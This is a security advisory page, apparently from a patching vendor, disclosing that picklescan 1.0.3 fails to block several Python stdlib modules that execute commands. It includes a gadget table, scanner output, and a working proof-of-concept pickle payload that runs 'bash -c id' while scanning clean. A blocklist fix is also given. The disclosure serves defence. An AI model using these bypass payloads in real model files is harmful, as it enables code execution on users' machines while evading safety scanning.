Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

GHSA-g38g-8gr9-h9xp

PickleScan has multiple stdlib modules with direct RCE not in blocklist
Back to all
CVE

GHSA-g38g-8gr9-h9xp

PickleScan has multiple stdlib modules with direct RCE not in blocklist

Summary

picklescan v1.0.3 (latest) does not block at least 7 Python standard library modules that provide direct arbitrary command execution or code evaluation. A malicious pickle file importing these modules is reported as having 0 issues (CLEAN scan). This enables remote code execution that bypasses picklescan entirely.

Severity

Critical (CVSS 9.8) — Direct RCE with zero scanner detection. Affects all deployments relying on picklescan, including HuggingFace Hub.

Affected Versions

  • picklescan <= 1.0.3 (all versions including latest)

Details

Unblocked RCE Modules

| Module | Function | RCE Mechanism | picklescan Result |

|--------|----------|--------------|-------------------|

uuid | getcommand_stdout(cmd, *args) | subprocess.Popen((cmd,) + args) | CLEAN |

osxsupport | readoutput(cmdstring) | os.system() via temp file | CLEAN |

osxsupport | findbuild_tool(toolname) | Command injection via %s | CLEAN |

aixsupport | readcmd_output(cmdstring) | os.system() | CLEAN |

_pyrepl.pager | pipe_pager(text, cmd) | subprocess.Popen(cmd, shell=True) | CLEAN |

_pyrepl.pager | tempfile_pager(text, cmd) | os.system(cmd + ...) | CLEAN |

imaplib | IMAP4_stream(command) | subprocess.Popen(command, shell=True) | CLEAN |

test.support.script_helper | assertpythonok(*args) | Spawns python subprocess | CLEAN |

All 8 functions are in Python's standard library and importable on all platforms.

Scanner Output

$ picklescan -p uuid_rce.pkl
No issues found.
$ picklescan -p aix_rce.pkl
No issues found.
$ picklescan -p imaplib_rce.pkl
No issues found.

Meanwhile:

$ python3 -c "import pickle; pickle.loads(open('uuid_rce.pkl','rb').read())"
uid=501(user) gid=20(staff) groups=20(staff),501(access),12(everyone)

Blocklist Analysis

picklescan v1.0.3's unsafeglobals dict (scanner.py line 120-219) contains ~60 entries. None of the following modules appear:

  • uuid — not blocked
  • osxsupport — not blocked
  • aixsupport — not blocked
  • _pyrepl — not blocked
  • _pyrepl.pager — not blocked (parent wildcard doesn't apply since _pyrepl isn't blocked)
  • imaplib — not blocked
  • test — not blocked
  • test.support — not blocked
  • test.support.script_helper — not blocked

Proof of Concept

import struct, io, pickle
def sbu(s):
    b = s.encode()
    return b"\x8c" + struct.pack("<B", len(b)) + b
## uuid._get_command_stdout — arbitrary command execution
payload = (
    b"\x80\x04\x95" + struct.pack("<Q", 55)
    + sbu("uuid") + sbu("_get_command_stdout") + b"\x93"
    + sbu("bash") + sbu("-c") + sbu("id")
    + b"\x87" + b"R"   # TUPLE3 + REDUCE
    + b"."              # STOP
)
## Scan: 0 issues
from picklescan.scanner import scan_pickle_bytes
result = scan_pickle_bytes(io.BytesIO(payload), "test.pkl")
assert result.issues_count == 0  # CLEAN
## Execute: runs `id` command
pickle.loads(payload)

Tested Against

  • picklescan v1.0.3 (commit b999763, Feb 15 2026) — latest release
  • picklescan v0.0.21 — same result (modules never blocked in any version)

Impact

Any system using picklescan for pickle safety validation is vulnerable. This includes:

  • HuggingFace Hub — uses picklescan server-side to scan uploaded model files
  • ML pipelines — any CI/CD or loading pipeline using picklescan
  • Model registries — any registry relying on picklescan for safety checks

An attacker can upload a malicious model file to HuggingFace Hub that passes all picklescan checks and executes arbitrary code when loaded by a user.

Suggested Fix

Add to unsafeglobals in picklescan:

"uuid": "*",
"_osx_support": "*",
"_aix_support": "*",
"_pyrepl": "*",
"imaplib": {"IMAP4_stream"},
"test": "*",

Architectural recommendation: The blocklist approach is fundamentally flawed — new RCE-capable stdlib functions can be discovered faster than they are blocked. Consider:

  1. Switching to an allowlist (default-deny) for permitted globals
  2. Treating ALL unknown globals as dangerous by default (currently marked "Suspicious" but not counted as issues)

Resources

  • picklescan source: scanner.py lines 120-219 (unsafeglobals)
  • Python source: Lib/uuid.pyLib/osxsupport.pyLib/aixsupport.pyLib/_pyrepl/pager.pyLib/imaplib.py

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
-
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
C
H
U
-

Related Resources

No items found.

References

https://github.com/mmaitre314/picklescan/security/advisories/GHSA-g38g-8gr9-h9xp, https://github.com/mmaitre314/picklescan

Severity

9.8

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
9.8
EPSS Probability
0%
EPSS Percentile
0%
Introduced Version
0
Fix Available
1.0.4

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading